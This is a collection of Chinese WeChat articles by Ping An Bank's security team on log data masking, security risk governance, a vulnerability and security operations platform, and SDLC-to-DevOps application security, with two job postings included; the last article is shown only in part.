Fintech 安全之路

关于企业日志脱敏治理的经验之谈

Thu, 23 Mar 2023 20:03:00 +0800

平安银行安全团队 2023-03-23 20:03 上海

在个人信息保护越来越受到重视的当下，数据安全管控力度也不断加强，有关部门也对金融单位提出了更高的要求。

文：黄韦博裴玲

在个人信息保护越来越受重视的当下，国家数据安全管控力度也不断加强，尤其是对金融单位的管理要求也更加严格。本文是从快速治理的角度出发，分享基于日志管理平台所做的企业日志脱敏治理经验。

治理背景

在各类敏感信息存储媒介中，应用日志是其中的重点之一，由于业务方场景过于繁杂，研发人员可能于多种情况下在日志内留存敏感信息，例如：

保留业务信息以便取证溯源，如客服对话、订单。
保留上下游业务对接信息，以便进行链路跟踪。
特殊系统需要保留日志原文，便于外部监管和内部审计。
系统不含数据库，需要依靠日志做落盘存储。
公共框架/组件打印输出敏感信息。

故而，日志内敏感信息的问题也成了稽核监管在数据安全方面重点关注的事项。

治理成果

在半年多的阶段性治理后，应用系统日志内敏感信息的抽样命中比率同比下降了约87%，同时日志敏感信息检测已形成常态化治理机制，做到了及时发现、及时整改闭环，治理工作总体上取得了显著成效。

治理思路

基于行内已有统一的日志管理平台，在其他资源有限的情况下，想要快速收敛日志内敏感信息的风险问题，首要方案是将日志进行收口管理，同时向开发提供相关脱敏工具，并持续对日志内的敏感信息进行检测，督促开发基于检测结果进行排查和整改，以制度、流程、工具为基准，从三个层面推动治理。

一、初期准备

1、完善制度规范

强调应用日志内不可留存敏感信息的管理要求，并要求应用在上线时需同步完成日志管理平台的接入，以确保日志统一收口管理，同时明确例外申请渠道。

日志需要统一采集到日志平台进行访问。
应用日志内不允许记录明文敏感信息。
理清敏感信息基线，对日志脱敏的范围和标准进行圈定。
开放例外通道，针对特殊情况按标准例外流程管理。

2、建立联络机制

对于长期项目而言，跟管理层、项目组、执行团队建立良好的联络反馈机制，是非常有必要的。我们主要从下面两点进行了准备。

1）建立项目组

纳入相关领域的研发负责人，保障对项目执行的有效落地。同时，维护了安全接口人（PMO）体系，保障安全团队对于研发团队的要求能够得到准确及快速的传达。

2）建立沟通汇报机制

成立项目沟通群，确保大家问题能得到及时反馈，如收到针对脱敏工具和流程的合理建议，也会尽快确认并纳入版本进行优化；制定项目周例会，线下沟通项目进展及当前风险；定期向领导层同步项目进度，让问题和成果都变得透明化。

3、提供工具支撑

1）统一日志管理平台

日志统一收口管理，默认前端脱敏展示，并提供实时和异步检测日志敏感信息的能力，方便开发进行快速排查并整改原始日志。

持续抽样检测日志：在上送日志时抽样若干条日志进行检测，如命中敏感信息规则，则记录，形成敏感信息报表。
异步检测存量日志能力：对历史日志进行全量跑批检测，用以辅助排查敏感信息。

2）统一日志脱敏工具

项目组为研发团队提供了脱敏SDK，支持通过全局配置和注解（高优先级）进行脱敏。

如果仅对字符串进行掩码，调用敏感字段类型对应的方法即可。
如果需要简单对象（pojo）进行脱敏，可以先对其中涉及的敏感字段进行注解标记，调用SDK后会正常返回一个json字符串。
如果是对复杂对象进行脱敏，则在返回结果后，可能会丢失掉原对象中的结构细节（fastjson.toString的特点）。

3）统一安全运营平台

用于对接日志管理平台，将获取到的检测结果自动生成整改工单，利用平台的线上化跟进能力，自动分发整改项，自动进行整改指标统计，闭环日志脱敏整改问题；并对接研发管理平台，提供安全质量门禁检查的版本管控能力。

二、中期治理

1、收敛日志访问权限

1）推动所有存量应用系统接入统一日志管理平台，并建立相关管控流程确保增量应用上线前同步完成接入。同时根据系统开发和运维角色进行针对性赋权，确保日志平台的权限最小化管控。

2）推动回收研发人员冗余的生产环境OS权限（在日志脱敏事项治理之前，不少研发人员都拥有生产环境OS权限，能够直接通过生产环境机器查看日志）

2、日志管理平台默认前端掩码

1）日志平台在接口层面对展示内容进行敏感信息掩码，确保原始日志未脱敏的情况下，研发团队在日志管理平台查询日志也不会接触到敏感信息。

2）为避免日志平台的前端掩码和原始日志的掩码难以区分，从而对开发造成困扰，日志平台前端掩码采用特殊的“^”符号，区别于原始日志掩码采用的“*”符号。

原始日志脱敏样例

日志平台前端默认掩码样例

3）为避免日志平台前端误掩码导致影响开发排障，用户可通过点击“眼睛”标识符查看原始日志，同时限制单次查看次数，并对查看行为进行审计。

4）建立对抗机制，检查组定期对掩码情况进行检查，规则组持续对掩码规则进行优化，确保应掩尽掩。

3、推动本地原始日志脱敏整改

1）研发流程管控：在研发安全流程中增加“日志内禁止记录敏感信息”checklist，确保开发人员在设计开发阶段知晓相关规定，同时在安全质量门禁处新增针对日志内敏感信息的检查项，用于开发进行自查。

2）持续检查：借助日志管理平台的实时检测和异步检测能力，持续对应用生产日志进行敏感信息的检测，如发现问题则自动生成合规整改项，要求开发进行相应整改，整改未完成则进行版本管控。

3）自动验收机制：整改完成后，系统获取最新的日志平台检测结果，未发现敏感信息则关闭整改工单，发现则将整改工单打回待处理状态。

三、长期规划

在长期的规划中，我们计划再从下面几点逐步进行实施：

1、标准化日志的输出格式

联合公共框架/组件以及研发团队的架构师，制定并规范日志格式标准，减少因日志打印不规范导致的不可控的脱敏成本。

2、持续优化工具

1）优化脱敏SDK：增加对多类加密算法和场景的支持，满足非日志场景的数据脱敏需求，提升数据安全治理能力。

2）推动公共框架/组件治理：联合相关负责人统一标准，屏蔽掉业务信息的输出，并添加对字段级别的脱敏配置。

3）优化敏感信息检测规则：持续优化敏感信息检测规则，并通过增加二次过滤黑名单机制，降低敏感信息检测误报率。

后记

显然由于敏感信息检测规则无法确保百分百准确和不遗漏，想要实现日志内敏感信息的完全治理，单靠检测和整改总归是滞后的，好的方案仍然是从源头把控住敏感信息的存储、使用和传输，但如果想到做到这种程度目前看来还有很大的难度，也欢迎大家一起探讨。

阅读原文

跳转微信打开

We Want You!｜平安银行研发安全专家招聘

Mon, 30 Jan 2023 14:05:00 +0800

原创平安银行安全团队 2023-01-30 14:05 上海

平安银行安全团队致力于保障亿万用户的信息安全，共建金融行业的安全生态环境。我们在这里，期待你的加入！

平安银行是一家全国性股份制商业银行（SZ000001），其前身深圳发展银行是中国内地首家公开上市的全国性股份制银行。截至2022年6月末，共有在职员工40,745人（含派遣人员），通过全国109家分行、1192家营业机构为客户提供多种金融服务。经过多年发展，本行已成长为一家金融服务种类齐全、机构网点覆盖面广、经营管理成熟稳健、品牌影响市场领先的股份制商业银行。本行紧跟国家战略，持续提升金融服务实体经济的能力，全面强化金融风险防控，全力助推经济高质量发展，业务发展保持了稳健增长态势。

✎✎✎

平安银行在全力以赴向着“中国最卓越、全球领先的智能化零售银行”的目标不断迈进的同时，也一直充分重视着信息安全的发展与建设。平安银行安全团队致力于保障亿万用户的信息安全，共建金融行业的安全生态环境。

我们在这里，期待你的加入！

研发安全专家

本科及以上/5年以上工作经验/薪资面议

工作职责：

1、负责银行研发安全领域工作，包括但不限于应用安全体系规划、风险治理、重点业务系统的安全评估和安全架构设计工作；

2、负责银行研发安全能力的建设，包括但不限于RASP、WEB安全扫描、代码安全扫描、交互式扫描、镜像安全扫描、流量威胁感知等；

3、推动云原生下应用安全体系的持续建设优化，负责设计通用的安全框架、安全组件及安全解决方案，引领技术团队开展SDL落实；

4、参与制定研发安全流程，并通过工具、技术等手段将安全能力与基础架构融合并推进落地，持续优化完善，达成总体安全管理目标。

任职要求：

1、本科及以上学历，5年以上企业应用安全建设、SDL落地等经验；

2、扎实的编码能力，能够使用Java/Python/Golang/Nodejs/C++等其中一种语言开展工具研发；

3、有相关安全工具平台开发经验，包括不限于动态、静态等各类漏洞检测、流量处理、资产采集等经验；

4、熟悉业内主流的安全机制、安全解决方案及安全体系，能够独立负责中大型应用系统解决方案并主导进行建设，有云原生相关安全经验优先；

5、良好的沟通表达能力和文案编写能力，善于团队协作，项目管理，主动思考，良好的自我驱动力。

工作地址：

上海-浦东新区

简历投至邮箱：ex-wangjiahui006@pingan.com.cn

在平安

In PINGAN

PINGAN

工作在平安

成长在平安

温暖在平安

左右滑动查看更多

阅读原文

跳转微信打开

管理治理联动，助力安全风险管控能力提升

Tue, 17 Jan 2023 18:00:00 +0800

原创 kk 2023-01-17 18:00 上海

数字化时代科技安全风险治理面临巨大挑战，安全团队需要思考从运动式检查转为长效化管控。

"本文从数字化风险和安全能力建设的角度，分析了当前数字化时代科技安全风险治理面临的挑战，并提出一套以安全为核心的风险治理方法，用以治理和管控各类应用安全风险和数据安全风险。"

面临挑战及应对思路

数字化时代科技安全风险治理面临巨大挑战

结合风险挑战下凸显的安全问题及各类监管要求，明确由安全部门和合规部门参与主导的风险治理需求和目标，形成一套能力完备、可成长的安全管理体系，从运动式检查转变为长效化管控，多方协同，扭转安全管理的被动局面。

安全治理整体思路

科技安全及合规风险治理总体需求及目标(基于全行信息安全及合规管理方针)

安全管理体系部分详述

制度建设

基于风险治理的总体需求和目标，建立健全全流程安全管理制度。制度规范作为安全防护要求、管理策略、操作规程等集合，一般需要覆盖以下几点要求：

角色及职责界定
明确适用范围
明确安全管理要求
需要遵循的操作及处置流程
例外处理办法

目前行内已发布实施涵盖数据安全、应用安全、研发流程安全等制度规范，如《应用安全管理规范》、《数据安全管理规范》、《开源软件安全管理实施细则》等，同时为预防和应对变化的风险趋势，我们也在不断细化、完善、更新制度体系。

流程建设

流程建设分为「事件处理型」和「研发流程型」。

风险事件从上报到验证关闭，全流程状态通知，并逐级抄送，提升处置时效。并将流程中的数据打通，可提供丰富直观的报表，降低运营成本的同时也让运营工作更加精细化。

一般事件类处置流程

经过安全团队的严格推进和研发团队的定制化实践，行内SDLC执行已逐渐由安全主导转变为开发主导，契合DevOps流程。研发流程配合安全统一管控，实现自动化能力提升，安全也可做到过程数据卡点管控，对发现的漏洞执行溯源。

结合SDLC的DevOps安全与风险管控机制

随着安全服务和安全能力的不断成长和进化，安全管控体系中的执行要求、检查、控制、保障，绝大部分由工具自动化静默执行。安全工具和卡点管控嵌入到需求管理、测试管理、版本管理等各类流程中，从另一方面来说，也保证了需求必须按照标准化流程流转。

研发安全风险管控具体流程

在SDLC的安全测试环节，包括人工测试、工具扫描发现的漏洞，统一在sop安全运营平台实现闭环管理。

漏洞处理流程

运营分析

应用安全的持续运营，能够打通各环节的建设内容，促进整个体系良性发展。

安全运营分析包括三个方面：

运营指标：支持多类型事件、多维度数据分析，对安全团队自身运营质量和其他团队的执行质量都有数据化展示分析，最终形成制度化考核机制，对涉及的人、过程、技术进行综合评估
高效汇报机制：定期通过邮件、例会等形式同步各干系人运营质量及安全要求，自上而下推动风险管控和制度的更新迭代
持续运营提升：依据上一轮成效评估，持续改进管理过程和运营手段，实现对业务的价值输出目标

安全运营分析的三个方面

安全运营是一个长久化、持续性过程。尤其是在行内数据量庞大，组织架构复杂、信息分散的背景下，运营机制的自动化和可视化，很大程度上决定着运营质量和效率。我们要做的是一个实时汇总，能够感知全局安全态势的平台，通过大数据分析提供新一轮迭代优化的依据。

各类风险报表化展示

配套的基础设施建设

围绕安全风险治理的需求提出的治理体系框架，除了管理体系建设、标准化流程管理、运营质量分析，还必须有基础设施支撑：

流量分析检测平台：通过专有扫描环境，灵活定制扫描规则，实现实时/周期记录、扫描多场景数据
代码扫描平台：IDE插件自助检测增量/全量代码，覆盖传统安全漏洞和合规治理检测规则
应用堆栈分析平台：结合行内APM监测工具的安全风险扫描平台，可检测传统安全漏洞和开源组件类风险扫描
开源软件安全治理：专项治理开源软件，实现组件漏洞应急响应、组件依赖分析及安全版本查询，推动行内架构和服务治理、统一组件开发和接入
…………

应用周期涉及的安全基础设施

流量分析检测

写在最后

安全风险治理体系的建设非一朝一夕，也非一成不变，这里有一个基本思路可以参考：

一、识别主要风险

二、制定治理方案

三、定制规则试点运营

四、制定风险治理流程

五、完善规范制度

六、消灭存量管控增量

七、持续运营提升

遵循复盘优化、循环上升的思路，梳理出需求和目标，协调安全、业务、研发、架构等部门的参与配合，管理治理联动，助力安全风险管控能力提升。

阅读原文

跳转微信打开

新年快乐！

Sun, 01 Jan 2023 13:43:00 +0800

2023-01-01 13:43 上海

新年快乐！

跳转微信打开

安全招聘｜平安银行人才招募令！

Wed, 16 Jun 2021 18:32:00 +0800

原创平安银行应用安全 2021-06-16 18:32

这是一个牛人辈出且有爱的团队，有着一个够大且发展快速的平台，同时还可以提供一份不错的薪水！期待热爱安全，同时在安全领域有一技之长的你！

公司介绍

Company profile

PINGAN

中国平安《财富》世界五百强排名21位，《福布斯》全球上市公司2000强第7位，蝉联全球多元保险企业首位；Brand Z最具价值中国品牌100强榜单第7位，金融品牌第2位；FutureBrand 全球品牌100强第7位，保险品牌第1位。平安银行股份有限公司是中国平安控股的一家跨区域经营的股份制商业银行（股票名称：平安银行股票代码：000001）。平安银行以打造“中国最卓越、全球领先的智能化零售银行”为战略目标，持续坚持“科技引领、零售突破、对公做精”十二字策略方针，始终坚持“三不变”，即坚持零售转型方向不变；坚持“综合金融、科技赋能”两大核心优势不变；坚持均衡、协同发展思路不变。着力打造“数字银行、生态银行、平台银行”三张名片。

用科技引领金融，金融服务生活

（左右滑动查看更多）

招聘岗位

Job description

PINGAN

高级应用安全工程师

工作职责：

1、负责银行应用系统的安全评审、安全功能设计、安全测试和安全事件应急响应等；

2、负责银行应用系统安全开发管理过程的安全审核，提供安全解决方案，参与优化公司SDLC最佳实践；

3、跟进业内创新技术，为银行引入新技术提供安全解决方案；

4、负责银行SDLC相关配套工具IAST，SAST等工具平台的建设与优化。

任职要求：

1、熟悉常见WEB安全漏洞原理与防范，可提供代码层的漏洞修复方案；

2、了解Java、Python、Go等一种或几种程序语言；

3、了解业界安全攻防动态，追踪最新安全漏洞；

4、具备良好沟通、协调能力、分析和解决问题的能力；

5、计算机，软件工程，网络安全等全日制本科及以上学历；

6、3年以上经验。

资深安全开发工程师(Python或Java方向)

工作职责：

1.负责各类安全工具平台、安全产品的建设研发，包括流量处理、RASP、 DAST、 SAST 等各类安全工具平台的建设研发；

2.负责建设支撑SDLC流程节点的各类工具平台，落实全行应用安全治理上相关的要求及检查机制的自动化闭环；

3.推动研发流程及相关基础技术架构的持续优化完善。

任职要求：

1.扎实的编程基础、精通Java、 Python开发语言，熟悉JVM、Kafka、 ELK、分布式等核心技术；

2.熟悉软件开发生命周期(SDLC)，熟悉业内主流的安全机制、安全解决方案、安全体系优先；

3.有相关的安全工具平台开发经验，包括不限于动态、静态等各类漏洞检测、流量处理、资产采集等经验；

4.熟练掌握主流开发框架，如Spring、 MyBatis, 熟悉高可用、高性能优化方案；

5.思路清晰、较好的沟通能力与技术学习能力，有强烈责任心及团队意识；

6.本科以上、3年以上互联网公司经历优先。

数据安全治理专家

工作职责：

1、发现数据安全生命周期各环节面临的安全风险，并制定相关的风险管控方案；

2、推动数据治理相关方案的工具化、线上化，从而保证银行数据数据互通方面的效率和安全性；

3、结合监管及银行安全合规要求，形成系统化的平台来实现风险控制及监控，包括不限于自动化加密、脱敏引擎，敏感数据识别分级打标引擎的落地及优化；

4、结合现有银行数据输入输出的业务需求，对数据进行安全合规的审计及智能化审批，提升数据交互时的安全管控及效率:

5、在国家标准及行业标准的基础上提升，保障业务的前提下，全面提高银行在数据安全方面的能力。

任职要求：

1、有数据安全风险治理的专项工作经验(数据脱敏、数据加密、api 治理、数据资产地图、隐私保护) ;

2、熟悉各种常见通用加密算法(AES、RSA、 SHA以及国密等)，以及隐私保护算法(K-匿名、差分隐私、L-多样性)，掌握相关安全通信协议、熟悉签名认证；

3、掌握数据安全和隐私保护方面的安全技术，对国家相关法律法规及行业标准有深入理解；

4、了解大数据业务建模、数据仓库建模、元数据、数据血缘及其实现方法有全局化的数据架构能力相关经验更佳；

5、掌握python/java/go等至少一门编程语言;

6、本科及以上，5年以上安全行业工作经验(数据安全、应用安全、信息安全、安全运营)，有金融行业工作背景优先。

简历投至邮箱：peiling757@pingan.com.cn

工作地点：上海浦东旭辉职场/深圳罗湖总行职场

如有疑问，可联系小编咨询（微信：Miniseven0）

在平安

In the PINGAN

PINGAN

工作在平安

成长在平安

温暖在平安

左右滑动查看更多

阅读原文

跳转微信打开

银行业安全运营平台的建设与思考

Tue, 27 Oct 2020 19:16:00 +0800

原创裴玲 2020-10-27 19:16

安全运营是应用安全管控体系建设的能力支撑，而安全运营平台则是为安全运营做好工具支撑，提供更高效、更便捷的运营方式和途径。

文：平安银行应用安全团队裴玲/丸子

引言

笔者目前就职于金融行业应用安全团队，负责产品及运营相关工作。将行内原先使用的漏洞系统重构并建设安全运营平台，是我完成的第一个任务，故想把建设过程中的一些实践/思考写出来，同大家一起交流探讨，也正好算是一个阶段的总结和反思。

01 整体产品架构

基于对“安全运营”的理解（可参看职业欠钱的《我理解的安全运营》《再谈安全运营》

https://zhuanlan.zhihu.com/p/39467201），SOP安全运营平台的目标及定位：帮助团队更好地落地安全运营工作，实现流程化、规范化、可视化的目标，提升团队“安全运营”工作效率，从而提高企业整体的安全风险对抗能力。

平台作为应用安全管控体系建设过程中的“工具支撑”，实现了漏洞生命周期闭环、自研扫描工具集成、组件安全线上化治理、SDLC运营及线上发布版本安全管控、安全资产建设、应用安全画像及风险模型建设等模块功能。

这些功能模块之间的联动，构建了“要求—检查—管控”这样体系化的安全运营模式，解决了运营过程中人力运营成本过高、资产不清晰、安全问题处理流程不闭环、SDLC执行不到位等问题，提升了整体安全运营效率。

02 各模块建设思考

漏洞生命周期的闭环

不论是上线前的人工安全测试，还是自主研发的安全检测工具，都是针对不同层面风险的“检查”手段，而漏洞则是检查结果的直观反馈，是各类风险的具象反映。漏洞管理作为应用安全建设中不可或缺的部分，如何解放运营人员在这方面的工作量，提升效率，这是第一个问题。

原始的漏洞系统，存在流程不完善、各类信息需人工维护、权限划分不清晰等问题，处理跟进一个漏洞需要花费大量人工成本。

为了解决上述问题，我们进行了如下两个改造：

1、对接CMS（Content Management System，该系统汇聚了组织、应用系统、人员等信息），将各类需要人工维护的信息统一改为系统对接，设定提交漏洞按照“应用”维度（可以拆分成的最小的一个系统，即最小单元Unit），通过应用信息则可自动关联出资产、人员及组织信息。并将执行过程中发现的数据差异反馈CMS，协助CMS自身去完善数据、矫正数据准确性，修正后的数据则可以更好被安全系统利用，从而形成良性循环。

2、在漏洞流程设计上，基于银行系统功能的迭代流程，综合考虑不同性质和环境漏洞处理的区别，设计了如下漏洞处理流程：

（在系统迭代上线前发现的漏洞称之为“版本迭代漏洞”，其他则称为“非版本迭代漏洞”。版本迭代漏洞因未上线投产故都是在测试环境；非版本迭代漏洞则可能是测试环境漏洞，也可能是生产环境漏洞）

在这样的模式下，一个漏洞从被提出，到定位资产以及分配至对应人员解决，再到进行验证修复关闭，在处理效率上有了大幅提升。

当然漏洞的闭环不仅是到修复为止，漏洞的复盘也是极其重要的一环。在观察数据的过程中，我们发现一些系统在执行了SDLC后，仍然有不少漏洞出现。这些漏洞是因为安全评估、安全需求识别、安全设计、代码审计还是安全测试环节出现了问题导致？如果能知道产生问题的环节便能更好地“对症下药”了。

顺着这个思路，我们想到可通过漏洞的版本信息反溯SDLC执行过程质量。针对版本迭代漏洞，可由安全工程师在上报漏洞时填写产生漏洞的版本和需求信息；而针对非版本迭代漏洞，目前暂时仅能通过由开发填写产生漏洞的版本和需求信息的方式（后续计划与统一接口平台进行对接，这样便能从接口信息中溯源版本信息）。有了版本和需求信息，则可查询到SDLC中安全环节的过程数据，检视SDLC执行情况。

同时，非版本迭代的版本信息也可以帮助我们了解该漏洞在线上存在的时长，对比这段时间是否进行了内部安全测试，从而检视安全测试的质量。

除了实现基础资产对接及完善漏洞闭环流程外，我们也设置了“漏洞积分”。这个分值提供了一个方式帮助定义部门及开发安全性指标：将漏洞分值累计到漏洞责任人/部门，做为评判是否需重新参加安全培训的依据，是一种“管控手段”，类似于考取驾照，扣到一定分数，就需要回炉重造。不仅如此，它还可以作为应用的安全风险值模型中的一个成分，为后续建设应用安全画像打好基础。

扫描工具在安全运营平台的集成

扫描工具是“检查阶段”的重要部分，我们自主研发了一些安全检测工具：

1、基于流量的被动扫描工具（被动式漏洞扫描平台建设之路）

2、基于源代码的扫描工具

3、基于字节码的扫描工具（企业快速实践部署IAST/RASP的一种新思路）

安全运营平台作为各类扫描工具的前端支持，用于收集扫描授权地址、设置扫描规则、展示扫描漏洞数据、对数据进行去重、以及制定扫描漏洞处理流程（包括自动处理及人工处理）。这些工具扫描的结果如何处理过滤，形成高质量的数据汇入漏洞模块中？这是第二个问题。

针对误报问题，既需要研发人员不断优化规则，也需要有合理的流程，对扫描结果进行分析运营。于是针对工具扫描出的漏洞我们分为三个处理阶段：

1、规则刚上线的时候，因误报较多，此时扫描到的漏洞会先存放在单独的扫描漏洞模块，负责规则的安全运营者以人工方式初步判断漏洞是否存在，并将漏洞提到漏洞审核模块（其中一部分系统无法自动对应资产的漏洞，由人工对资产进行定位），再由各业务线的安全工程师对漏洞审核模块的漏洞进行审核和处理（可进行上报/合并上报/忽略/关联历史漏洞等），最终提到漏洞管理模块，传递给开发进行确认与修复，进入既定的漏洞处理流程中。

2、规则稳定运行一段时间后，会自动将扫描到的漏洞推送到漏洞审核中，直接由各业务线的安全工程师进行审核处理，然后提至漏洞管理模块。

3、当扫描漏洞的准确率达到一定水准后，会将漏洞审核中的漏洞，由系统自动提交至漏洞管理，即直接将漏洞传递给开发进行确认与修复，无需让安全工程师先进行审核。

这样经过三个阶段，我们可以保证漏洞管理模块漏洞数据的质量，尽量真实且权威。

针对上述思路，每一种工具的每个插件，它的开关、扫描出的漏洞等级、去重规则、是否自动推送至漏洞审核、是否自动推送至开发等，在前端页面实现配置化管理，如此一来，运营人员可结合实际数据情况进行相应操作（例如某种检测插件准确率达到一定高度则开启自动推送，如在某段时间准确率又突然下降，则暂时关闭自动推送），在对扫描结果的处理上便更加灵活。

组件安全的治理

除了一些web漏洞之外，通用组件一直是容易被外界突破安全防线的一个关口，当前大部分公司都会面临通用组件的安全问题。针对组件漏洞，适用范围广，造成危害大，动辄成千上万的资产收到影响，修复起来并不是件容易的事情。传统case by case方式，通过线下整理数据跟进修复，收效甚微。在组件安全这个方向，如何做好问题修复及管控是第三个问题。

在经过讨论及技术论证，确认方案可落地后，我们根据《通用组件安全治理三步走实践》这篇文章介绍的思路，进行了开源组件模块的研发。组件漏洞处理方式区别与应用漏洞，我们将常见的一些组件漏洞放在这个模块单独跟进处理，无需开发人员在系统上操作任何按钮，只需按照修复方案完成修复后并上平台查看是否还存在受影响资产即可。

当然，除了有针对存量问题的流程及方案，我们也需考虑如何在研发流程中对组件安全问题作出检查，从而控制增量组件安全问题。

1. 通过在版本发布过程中进行控制，如果应用版本发布过程中仍然存在组件安全问题，将禁止发版强行阻断，确保新增应用无历史组件安全问题；

2. 通过在组件仓库设置组件黑名单，如果使用低版本的组件将无法打包成功，强制要求开发升级版本。

研发过程的安全管理（SDLC运营）

Sop安全运营平台通过对接需求及研发管理平台，在需求拆分到开发任务后的评审环节，将安全要求作为评审内容的一部分，引导开发人员对安全要求进行自行评审/实施安全设计。

有了安全评审和安全设计的数据，再结合各维度安全检测（包括人工安全测试、应用层漏洞扫描、组件安全检测、源代码安全扫描）的检查结果，我们便可以将研发流程中的安全过程数据汇聚，形成综合统一结论，并在系统层面实现“管控增量问题”。

在经过对各业务线系统的版本发布流程以及行内研发流程的调研后，我们制定了版本安全管控的方案。将安全检测划分为不同维度（例如划分为应用层安全风险、源代码安全风险、组件安全风险），最终的安全检测结论是几个维度的结论合集。根据既定的规则，在测试完成环节，给予安全检测的结论与报告。如结论是通过并且报告正常进行了存档，才能顺利进行版本移交，进行代码冻结，从而完成版本的发布，否则将进行阻断。

如果检测实时性够高，可以将检测结论尽量前置，做到在开发环节就可以随时查看安全检测情况，从而更快速解决安全问题。并且在代码冻结之后，封板之前（也就是发布前的最后一个动作）也再一次进行安全检测结论的校验，多环节把控版本安全质量。

安全资产与安全画像

当然，以上思路的实现，少不了安全资产数据的支撑。“资产数据是安全工作的基石”，我们只有将资产梳理清晰，才能更好地站在安全风险视角去及时发现问题、溯源问题和解决问题，从而提高安全管理效率。例如前面提到的组件安全治理，需要掌握全行的组件及版本信息，以及目标（应用）所依赖的全部组件信息，才能做到当某一组件出现安全风险后，实现快速排查和定位受影响资产。

通过对接CMS/HIDS等，我们奠定了建设安全资产的基础。在此基础上，针对已有的资产数据，我们只需根据安全制定的策略给各资产打上安全标签，并根据实际情况对资产的安全标签进行动态维护和运营。针对其他现有系统未覆盖到的数据，我们可以通过主动探测和被动扫描的方式，如采集目标网络的流量,对流量中数据进行分析,从而发现未知的网络资产信息。当然这其中还涉及到关于数据采集、数据清洗、数据关联等很多功能模块，这里由于篇幅原因便不再展开。

在完善好资产的一些安全属性后（如是否面向互联网、登录认证方式等），再结合应用的各类安全风险，便可以刻画应用安全画像。

有了每个应用的安全画像，便可建设安全风险模型，定义风险阀值，通过阀值来检查各应用的整体安全情况，制作整体的安全风险看板，展示整体安全风险趋势、风险累积或风险消除等情况。

03 总结

通过以上几个模块的介绍和分析，我们可以发现，各模块之间围绕着“要求—检查—管控”这条线有着不可分割的紧密联系。研发安全管理中的安全评审与设计是要求，人工安全测试和各类工具扫描是检查手段，漏洞则是检查结果，通过漏洞的“复盘”“溯源”可以分析出“要求”的执行是否真正落地。漏洞的修复和漏洞积分是管控手段，各维度检查结果汇总并与研发流程结合进行的版本控制，也是管控手段，通过各类管控才能有效控制安全风险。而安全画像/风险看板则是要求-检查-管控中的过程数据，有了这些数据进而可以帮助安全运营人员更直观了解整体以及每个应用的安全风险和当前状态，准确定位安全防护的重点。

除了思路上的总结，在建设平台过程中，也有两点经验想要分享：

要对系统的定位非常清晰。时刻站在“做系统的目的是为了什么，做的这些功能到底能否真正帮助实现目的”的角度思考，并且需要有整体架构的规划，才能让系统在不断“壮大”的过程中不至于失了“重心”而坍塌；
产品的易用性直接决定了运营难度的高低，在充分结合各类现有的安全工具的基础上，一定要考虑尽量贴合企业自身的各类流程（如研发流程等），将安全运营的各个环节有效融入到日常的研发流程中。

最后，在从SDLC到DevOps的广义应用安全管控体系建设下，安全运营是贯穿整体的能力支撑。如同lakehu在《小步快跑，快速迭代：安全运营的器术法道》说到的“安全是一个动态过程，它随着形势在不断变化，运营就是发现变化趋势调整优化安全策略达到安全目标的重要手段”，安全运营平台的建设则是“帮助运营人员直观发现安全变化趋势，为优化安全策略提供数据决策能力”，是为安全运营工作做好工具支撑，提供更高效、更便捷的运营方式和途径。

END

感谢职业欠钱前辈、lakehu前辈对文章引用之处的授权。此文章仅是自己在一段时间内的个人总结，可能有很多不足的地方，诚心欢迎各位给予意见建议或交流探讨。

阅读原文

跳转微信打开

从SDLC到DevOps下的广义应用安全管控体系

Tue, 01 Sep 2020 11:37:00 +0800

贾凯 2020-09-01 11:37

在新时期对更频繁、快捷、可靠以及智能的要求下，传统意义上的SDLC模式逐渐成为整个研发流程中的短板，企业安全需转变思维，建设在敏捷模式下的广义应用安全体系。

文/平安银行应用安全团队@贾凯

前言

17年起，我们引入建立了适合内部研发的SDLC流程，在传统的研发模式下，一个需求从意向拆分到用户故事，再到开发子任务，一次迭代大多都要经过2周以上的时间。经过重人力运营的严格SDLC活动（各业务开发条线配备一名或多名专职安全运营人力进入开发团队深度运营），完成下来基本上可以极大的降低应用安全风险。但随着这两年公司IT人力迅速扩张，以及各类业务需求的爆发增长，推动着敏捷开发的迭代周期不断缩短，倒逼研发模式向DevOps转型。这种状态下，重人力运营的SDLC逐渐成为整个开发流程中的短板，对于动辄数千个应用的组织来说，也只能挑选重要的业务系统执行SDLC，大量内网应用无人力覆盖，而且在新时期对更频繁、快捷、可靠以及智能的要求下，愈发凸显出这种模式的缺点，由此必须转变思维，建设在敏捷模式下的广义应用安全体系。

SDLC模式

SDLC是定义在安全团队及研发团队共同配合下的安全活动，在对需求做完安全评审以后，除了最终需要安全团队执行的安全测试外其余都需要研发团队独立完成。

安全需求识别：研发团队架构师识别哪些需求是涉及到的安全。

安全设计环节：安全团队针对开发子任务给出指导性安全checklist，开发团队针对涉及到的接口做安全设计。

安全设计审查：开发团队架构师对安全设计做审查，评估安全设计无问题即可进入正常编码环节。

这几个环节下来，如果由开发完全独自执行，对于安全意识不够强的研发同事来说，安全设计的质量无法保证，这个时候基本上是安全团队在测试过程中对发现的安全漏洞进行溯源，定位安全设计及审查环节的问题，做常态化的检查。

在重要系统实践了一个时期后，绝大数研发团队的安全意识及安全编码能力得到了极大提升，遗留到测试环境下的漏洞数也大幅减少。当然，SDLC的推行需要领导的大力支持。

但在实践中也发现存在一些安全设计质量不佳的情况，仔细定位下来发现基本上是：

1、新入职的员工即使经过强制安全培训后，安全设计及安全编码依旧质量不足；

2、研发团队懈怠情况。

为此我们建设了漏洞积分，每个漏洞关闭时都必须对应到漏洞开发人员/小组/部门，积分到达一定限度后，强制进行安全考试，回炉接受再教育再次进行安全培训（类似驾照违规重新考试）。

此外依据这些数据对研发团队针对性的培训宣导，持续根据执行结果进行周期回溯检查。

DevOps下的应用安全管控体系

在以上的模式下，互联网的业务系统经过严格的SDLC后再进行发布，安全问题得到了保障。

但随着执行经验的积累，问题也随之而来：

1、如开篇所说，在向DevOps转型的过程中，动辄每周1次或多次的发版频率下，安全人力介入作为开发流程中关键的节点显然成为了瓶颈，业务需求的快速增长给人工评审及人工安全测试带来巨大压力；

2、在人力方面，显然不可能无休止增加投入，更重要的是安全工程师水平差异导致各业务线的安全性差异，人永远无法作为一个衡量安全管控标准的尺度；

3、虽然互联网应用已用此方投入大量人力堆了下来，但面对规模更大、更复杂的内网应用怎么管？用脚想也不能生搬硬套；

4、理想状态下SDLC应该是研发团队自驱执行的，安全一直在深度介入、带领的安全开发流程，不利于研发团队安全能力的长效实质提升，可能安全工程师一松懈，安全执行标准就下降。

所以当安全把控的效率及覆盖面上有了更高要求时，要根本解决这个困境，首要的是改变环境，通过安全基建去创造优化安全开发的环境，重新设计构建适用的应用安全管控体系。

